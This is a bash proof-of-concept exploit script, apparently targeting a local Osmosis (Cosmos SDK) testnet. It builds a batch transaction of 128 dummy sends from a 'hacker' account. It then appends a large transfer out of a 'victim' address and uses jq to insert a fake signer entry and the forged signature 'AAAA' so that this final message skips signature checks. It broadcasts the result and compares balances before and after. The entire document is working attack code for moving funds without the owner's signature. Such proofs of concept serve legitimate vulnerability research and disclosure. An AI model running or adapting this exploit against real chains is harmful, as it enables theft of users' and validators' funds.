#!/bin/bash
BINARY="osmosisd"
CHAIN_HOME="~/.osmosisd-local"
TX_FLAGS="--chain-id=localosmosis --keyring-backend=test --home=$CHAIN_HOME"
HACKER_ADDR=`$BINARY --keyring-backend=test --home=$CHAIN_HOME keys show -a hacker`
VICTIM_ADDR=`$BINARY --keyring-backend=test --home=$CHAIN_HOME keys show -a val`
# generate a payload of 128 msgs
cat << EOF > msgs.json
{
"body": {
"messages": [
EOF
for i in {1..128}; do
cat << EOF >> msgs.json
{
"@type": "/cosmos.bank.v1beta1.MsgSend",
"from_address": "osmo1d6aldupd067vm4807qvkcm20j5ts2nmhzwu4y7",
"to_address": "osmo1d6aldupd067vm4807qvkcm20j5ts2nmhzwu4y7",
"amount": [
{
"denom": "uosmo",
"amount": "10"
}
]
},
EOF
done
# add final message with skipped signature
cat << EOF >> msgs.json
{
"@type": "/cosmos.bank.v1beta1.MsgSend",
"from_address": "osmo12smx2wdlyttvyzvzg54y2vnqwq2qjateuf7thj",
"to_address": "osmo1d6aldupd067vm4807qvkcm20j5ts2nmhzwu4y7",
"amount": [
{
"denom": "uosmo",
"amount": "10000000"
}
]
}
EOF
cat << EOF >> msgs.json
],
"memo": "",
"timeout_height": "0",
"extension_options": [],
"non_critical_extension_options": []
},
"auth_info": {
"signer_infos": [],
"fee": {
"amount": [
{
"denom": "uosmo",
"amount": "12500"
}
],
"gas_limit": "5000000",
"payer": "",
"granter": ""
}
},
"signatures": []
}
EOF
# sign the payload from the hacker
$BINARY $TX_FLAGS tx sign msgs.json --from=hacker --sign-mode amino-json 2>&1 | jq > signed.json
# add fake signature and signer info
cat signed.json | \
jq '.auth_info.signer_infos[1] |= .+ {"public_key":{"@type":"/cosmos.crypto.secp256k1.PubKey","key":"AAAA"},
"sequence":"0","mode_info":{"single": {"mode": "SIGN_MODE_LEGACY_AMINO_JSON"}}}' | \
jq '.signatures[1] |= .+ "AAAA"' > signed2.json
VICTIM_BALANCE=`$BINARY --home=$CHAIN_HOME query bank balances $VICTIM_ADDR --denom uosmo`
HACKER_BALANCE=`$BINARY --home=$CHAIN_HOME query bank balances $HACKER_ADDR --denom uosmo`
echo "Balances before:"
echo "hacker: $HACKER_BALANCE"
echo "victim: $VICTIM_BALANCE"
# broadcast the payload
$BINARY $TX_FLAGS tx broadcast signed2.json --output json --broadcast-mode block > outout.json
# see the logs for the final message
cat outout.json| jq '.logs[-1]'
VICTIM_BALANCE=`$BINARY --home=$CHAIN_HOME query bank balances $VICTIM_ADDR --denom uosmo`
HACKER_BALANCE=`$BINARY --home=$CHAIN_HOME query bank balances $HACKER_ADDR --denom uosmo`
echo "Balances after:"
echo "hacker: $HACKER_BALANCE"
echo "victim: $VICTIM_BALANCE"